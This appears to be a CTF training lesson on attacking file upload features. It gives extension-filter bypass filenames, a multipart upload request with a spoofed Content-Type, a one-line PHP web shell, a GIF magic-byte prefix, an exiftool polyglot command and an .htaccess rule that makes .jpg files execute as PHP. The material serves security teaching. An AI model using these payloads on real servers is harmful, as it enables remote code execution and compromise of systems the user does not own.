File Upload Challenges

intermediate30 minWriteup

Exploiting file upload vulnerabilities

Learning Objectives

  • Bypass extension filters
  • Exploit MIME type checks
  • Upload web shells
  • Chain upload with other vulns

File upload vulnerabilities are common in CTFs and can lead to remote code execution. Learn the techniques to bypass filters and upload malicious files.

File uploads are high-value targets. A successful bypass often means RCE!

Extension Bypasses

Servers often filter by extension. Try these bypasses:

1606070;"># Double extensions
2shell.php.jpg
3shell.php.png
4 
5606070;"># Case variations
6shell.pHp
7shell.PHP
8 
9606070;"># Null byte (older PHP)
10shell.php%00.jpg
11 
12606070;"># Alternative PHP extensions
13shell.phtml
14shell.php3
15shell.php4
16shell.php5
17shell.phar

Content-Type Bypass

Change the Content-Type header to bypass MIME checks:

http
1POST /upload HTTP/1.1
2Content-Type: multipart/form-data; boundary=----WebKitFormBoundary
3 
4------WebKitFormBoundary
5Content-Disposition: form-data; name=606070;">#a5d6ff;">"file"; filename="shell.php"
6Content-Type: image/jpeg
7 
8<?php system($_GET[606070;">#a5d6ff;">'cmd']); ?>

Magic Bytes

Some servers check file signatures. Prepend magic bytes:

php
1GIF89a
2<?php system($_GET[606070;">#a5d6ff;">'cmd']); ?>
The file might still execute as PHP even with image magic bytes at the start.

Polyglot Files

Create files that are valid as both an image and PHP:

bash
1606070;"># Create a polyglot with exiftool
2exiftool -Comment=606070;">#a5d6ff;">"<?php system(\$_GET['cmd']); ?>" image.jpg
3mv image.jpg shell.php.jpg
Polyglots work when the server validates file content but executes based on extension.

.htaccess Tricks

If you can upload .htaccess files:

apache
1606070;"># Make .jpg files execute as PHP
2AddType application/x-httpd-php .jpg
Quick Quiz
Question 1 of 2

What is the purpose of adding magic bytes to a PHP shell?

Key Takeaways

  • Try multiple extension bypasses: double, case, alternative
  • Spoof Content-Type header in upload requests
  • Use magic bytes to bypass signature checks
  • Polyglot files can pass validation but execute as code
  • .htaccess uploads can change how files are processed